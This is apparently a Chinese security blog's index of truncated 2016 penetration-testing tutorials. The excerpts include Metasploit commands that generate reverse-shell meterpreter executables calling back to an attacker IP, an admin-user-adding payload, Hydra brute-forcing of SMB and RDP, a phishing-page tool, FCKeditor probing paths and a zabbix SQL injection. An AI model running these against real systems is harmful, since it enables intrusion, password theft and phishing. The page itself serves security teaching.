Eternal 8年前 (2016-08-27) 5897浏览 0评论

今天为大家介绍几个MSF中比较有意思的 PAYLOAD 模块。 添加用户到管理员组： use windows/adduser set user secist set pass Secist.com set wmic true generate -t ...

Eternal 8年前 (2016-08-27) 4764浏览 1评论

国内民间中小型网站有常见的”360网站卫士”,”百度云加速”,”云盾”,”安全宝”等 和国外这类CDN+云WAF的始祖”cloudflare&...

Eternal 8年前 (2016-08-26) 4274浏览 0评论

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面，来窃取用户的信息。下面我们来看看，如何使用该脚本。 首先，让我们从github上进行下载。 github clone https://github.com/Hypsurus/weem...

Eternal 8年前 (2016-08-25) 7760浏览 0评论

微软的“不安全dll加载”漏洞涉及Windows XP至Windows 7等多个版本的操作系统。由于Windows存在加载未指明完整路径的dll文件的机制，可能导致用户在使用第三方软件、玩游戏、听音乐时，会加载由木马 病毒伪装而成的dll文件，从而让...

Eternal 8年前 (2016-08-24) 7959浏览 1评论

直接通过已知文件路径，爆出fck编辑器的版本信息： FCKeditor/_whatsnew.html 通过常用上传地址，来测试可上传点是否存在： FCKeditor/editor/filemanager/browser/default/connec...

Eternal 8年前 (2016-08-21) 6073浏览 0评论

首先，我们先生成一个 PAYLOAD ： msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着，我们来...

Eternal 8年前 (2016-08-20) 9418浏览 1评论

00×01 首先，我们先来生成一个 meterpreter 类型的 PALOAD ： msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X &...

Eternal 8年前 (2016-08-19) 8282浏览 0评论

破解smb服务密码： hydra -l administrator -P pass 192.168.2.3 smb 成功获取密码：123 破解rdp服务密码： hydra -l administrator -P pass 192.168.2.3 ...

Eternal 8年前 (2016-08-18) 4085浏览 0评论

漏洞概述 zabbix是一个开源的企业级性能监控解决方案。近日，zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统，也可通过script等功能轻易直接获取zab...

Eternal 8年前 (2016-08-18) 5821浏览 0评论

上篇文章我们利用了 ms10-002 的这个 Exploit ，但目前来说它的利用率已经非常低了。因为它的 target 为IE6.0及以下的版本，只要用户按常规升级补丁，基本就很难利用到！今天，继续为大家介绍另一个IE的Exploit 。该EXP可...